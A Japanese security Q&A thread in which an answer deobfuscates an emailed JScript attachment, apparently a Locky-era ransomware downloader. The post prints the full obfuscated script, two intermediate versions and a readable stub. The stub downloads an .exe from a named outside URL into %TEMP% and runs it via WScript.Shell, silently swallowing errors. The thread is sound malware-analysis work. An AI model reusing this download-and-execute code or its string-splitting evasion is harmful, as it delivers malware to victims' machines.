
このjavascript攻撃はどのように機能しますか?

StackOverflowにも同様のコード抜粋についての質問がありますが、プログラミング関連の質問ではないという理由でクローズされているため、代わりにここで質問することにしました。

これはZipファイルとしてメールで送られてきたもので、メモ帳++で開けばJSファイルの内容を(おそらく?)実行せずに読むことができます。コードの一部を検索すると、Googleには https://www.hybrid-analysis.com にリンクする結果が多数あり、RansomWareであることが示されています。しかし、このコードが実際に何をするのかを説明してもらうことは可能でしょうか?

一見ランダムな単語の並びは、既知のマルウェアシグネチャとしてコードが検出されるのを回避するためにあるように見えますが、これらの文字列が操作されてコードが組み立てられ、実行されるということでしょうか?

// Obfuscated Windows Script Host downloader (WSH/JScript, not browser JavaScript).
// Two layers of noise are stacked on a very small program:
//   (1) jQuery-looking fragments assigned to globals that are never read again, and
//   (2) comma expressions such as ("dingle","adornment","n") whose leading operands are
//       discarded -- only the last operand contributes to the string.
// The decoded form is worked out step by step in the answer below.
// Defender's view: the calls that matter are ActiveXObject, WScript.Shell,
// MSXML2.XMLHTTP, ADODB.Stream and Shell.Run -- i.e. "fetch a file into %TEMP% and run it".
iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.Push( elem ); } } return matched; };"; // decoy, never read
fergusI = 0;
// Helper: returns the first character of the string. Used below to spell property
// names ("open", "send", "position", ...) one letter at a time.
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// String table. Once the comma-expression decoys are dropped and the "incentive"
// filler token is removed, the useful entries are:
//   [2] "ExpandEnvironmentStrings", [3] "%TEMP%", [4] ".exe", [5] "Run",
//   [6] "ActiveXObject", [9] "WScript.S", [11] "hell", [14] "MSXML2.XMLHTTP".
// The remaining entries are junk that is spliced out or never indexed.
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;"; // decoy
uUXTro.splice(7, fergusI + 2); // removes the two junk entries at indices 7-8
chubby = uUXTro[1+4+1].split("incentive").join(""); // "ActiveXObject"
// The constructor is looked up on the global object (`this` at top level of a WSH
// script) so the literal name "ActiveXObject" never appears in the file.
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT"; // decoy
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction(); // "p"
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction(); // "s"

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3]; // "WScript.S" + "hell" (still carrying the filler token)
uUXTro[fergusI + 2] = "EuHNTOs"; // decoy
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4); // removes three more junk entries
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // Shell = new ActiveXObject("WScript.Shell")
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.Push( n ); } "; // decoy
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // xhr = new ActiveXObject("MSXML2.XMLHTTP")
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];"; // decoy
fergusI /= 2; // fergusI is now 4
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]); // Shell.ExpandEnvironmentStrings("%TEMP%")
KcjXPEtu = "} return matched; };"; // decoy
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction(); // "E"

// Downloads the file at `poseidon` (a URL) to <%TEMP%>/<economic>.exe and runs it.
// The whole body sits in a try/catch with an empty handler, so any failure
// (no ActiveX, network error, write denied) makes the script exit silently.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // "<%TEMP%>/yROdkAds.exe"
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); "; // decoy
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false); // xhr.open("GET", poseidon, false) -- synchronous request

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];"; // decoy
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()](); // xhr.send()
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; "; // decoy
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D")); // stream = new ActiveXObject("ADODB.Stream")
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/\1>|)$/ );"; // decoy
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1); // arithmetic evaluates to 1 (adTypeBinary)
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;"; // decoy
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]); // stream.write(xhr.ResponseBody)
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );"; // decoy
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0; // stream.position = 0
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );"; // decoy
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2); // stream.saveToFile(jersey, 2) -- 2 = adSaveCreateOverWrite
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); "; // decoy
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); "; // decoy
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); "; // Shell.Run(jersey, 1, false): executes the saved file; the string comparison is just a disguised `false`, and the second statement on this line is a decoy
}

} catch (HiQurqnDJ) { }; // errors are swallowed deliberately -- nothing is ever shown to the user

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;"; // decoy
}
// Entry point: payload URL (assembled from fragments so the host name is not searchable
// as a literal) and the file name to save the download under.
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };"; // decoy
JLo

未使用の文字列がたくさんあります。一部はコンマ演算子の左側にあり、一部は使われない変数に代入されています(jQueryのコード断片のように見えますが、jQueryは実際にはここでは使用されていません)。

それらを削除すると、次のものが残ります。

// Stage 1 of the clean-up: the unused jQuery-style strings and the discarded
// comma-expression operands are gone; the executed logic is unchanged.
// (The leading underscore on the first and last line is a formatting artifact of the
// page, not part of the script.)
_fergusI = 0;
// Returns the first character of the string; used to spell property names letter by letter.
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// String table, still padded with the "incentive" filler token in the entries that matter.
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2); // drop two junk entries
chubby = uUXTro[1+4+1].split("incentive").join(""); // "ActiveXObject"
var lrAXrUK = this[chubby]; // ActiveXObject constructor, resolved via the global object
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction(); // "p"
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction(); // "s"

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3]; // "WScript.S" + "hell"
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4); // drop three junk entries
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // Shell
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // xhr
fergusI /= 2; // 4
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]); // Shell.ExpandEnvironmentStrings("%TEMP%")
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction(); // "E"

// Fetches `poseidon` into <%TEMP%>/<economic>.exe and runs it; all errors are swallowed.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // target path
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false); // xhr.open("GET", poseidon, false)

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()](); // xhr.send()
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D")); // ADODB.Stream
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1); // 1 (adTypeBinary)
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]); // stream.write(xhr.ResponseBody)
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0; // stream.position = 0
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2); // stream.saveToFile(jersey, 2)
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); // Shell.Run(jersey, 1, false)
}

} catch (HiQurqnDJ) { }; // silent on any failure

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds"); // entry point: payload URL and file name
_

これで、整理すべき非常に単純な文字列連結が多数残ります。また、Stringオブジェクトに対して定義されているcontradistinctionメソッドは、文字列の最初の文字を返すだけです。したがって、たとえば_("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction()_は単に_"p"_を意味します。これらを解決すると、次のようになります。

// Stage 2 of the clean-up: string concatenations and contradistinction() calls resolved.
// Only the "incentive" filler token and the index juggling on fergusI remain between
// this listing and the readable version further down.
// (The leading underscore on the first and last line is a page formatting artifact.)
_fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2); // drop two junk entries
chubby = uUXTro[1+4+1].split("incentive").join(""); // "ActiveXObject"
var lrAXrUK = this[chubby]; // ActiveXObject constructor
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3]; // "WScript.S" + "hell"
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4); // drop three junk entries
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join(""); // "WScript.Shell"
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + ""); // Shell
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join(""); // "MSXML2.XMLHTTP"
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]); // xhr
fergusI /= 2; // 4
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]); // Shell.ExpandEnvironmentStrings("%TEMP%")
revealede = "E";

// Fetches `poseidon` into <%TEMP%>/<economic>.exe and runs it; all errors are swallowed.
function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI]; // uUXTro[4] is ".exe"
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false); // xhr.open("GET", poseidon, false)

zBqJutIT[theoriess + "end"](); // xhr.send()
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D")); // ADODB.Stream
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1); // 1 (adTypeBinary)
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]); // stream.write(xhr.ResponseBody)
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0; // stream.position = 0
    PbOLTH["saveToFile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); // Shell.Run(jersey, 1, false)
}

} catch (HiQurqnDJ) { }; // silent on any failure

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds"); // entry point
_

ここで主要なポイントとなるのは、最終行にはっきりと現れているURLです。

すべての.split("incentive").join("")呼び出しが示すとおり、文字列"incentive"は、長い文字列が使用される前にそこから取り除かれるおとりです。これをuUXTroの初期値にも適用すると、一部の文字列が認識できるようになります。

// The string table with the "incentive" filler removed. The recognisable entries are the
// COM ProgIDs and member names the script needs ("ActiveXObject", "WScript.S"+"hell",
// "MSXML2.XMLHTTP", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run"); the rest is padding.
// (Leading underscores are a page formatting artifact.)
_var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];
_

残りの手順は説明しませんが、何が起こるかを追うのは非常に簡単です。fergusIはさまざまな整数値を取ってuUXTro配列のインデックスとして使われ、さらにいくつかの文字列連結が行われ、いくつかのおとり文字列がuUXTroからスプライスで取り除かれます(ただし一部は残ります)。最終的な結果は基本的に次のとおりです:

// Readable form of the whole script: a WSH download-and-execute stub.
// Defender's note: the sequence ADODB.Stream.saveToFile into %TEMP% immediately followed by
// WScript.Shell.Run of that file is the behaviour worth alerting on; the payload itself is
// whatever the server chooses to return, so it cannot be judged from this code alone.
// (Leading underscores are a page formatting artifact.)
_var Shell = new ActiveXObject("WScript.Shell");   // environment lookup and process launch
var xhr = new ActiveXObject("MSXML2.XMLHTTP");     // HTTP client
var exe = Shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe"; // drop location in the user's temp directory
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false); // synchronous GET of the payload
xhr.send();
if(xhr.status == 200) {
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  stream.type=1;                     // 1 = adTypeBinary: raw bytes, no text conversion
  stream.write(xhr.ResponseBody);    // response body as binary
  stream.position = 0;               // rewind before saving
  stream.saveToFile(exe, 2);         // 2 = adSaveCreateOverWrite
  stream.close();
  Shell.Run(exe, 1, false);          // launch the saved file; false = do not wait for it to exit
}
_

ここでは、最も重要な4つの変数に、解読した内容に基づく名前を付けました。

_Shell was OoKse
xhr was zBqJutIT
exe was jersey
stream was PbOLTH
_

要約すると、このスクリプトはダウンローダーです。攻撃者が制御するサーバーからプログラムを取得して実行しようとします。softlensjakartaのURLに直接アクセスしてみると、_STUPID LOCKY_という文字を含む12バイトのファイルが返ってきます。これは、侵害されたサーバーがその後修正済みであること(「STUPID LOCKY」は、誰かが配信を拒否する意図で置いたメッセージだと考えられます)を意味するか、あるいは、実際にマルウェアを送る前に脆弱なユーザーエージェントかどうかを確認する、非常に巧妙な悪意のあるサーバーである可能性もあります。

悪意のあるダウンローダーの場合、ダウンローダーのコードを見ただけでは、ペイロードが何になるかを実際に知ることはできません。同じURLから多数の異なる悪意のあるプログラムが、他のマルウェア作者が(あなたをだましてダウンローダーを実行させた人物に)支払う金額で決まるローテーションで配信されている可能性があります(ペイ・パー・インストール型マルウェア)。

user54862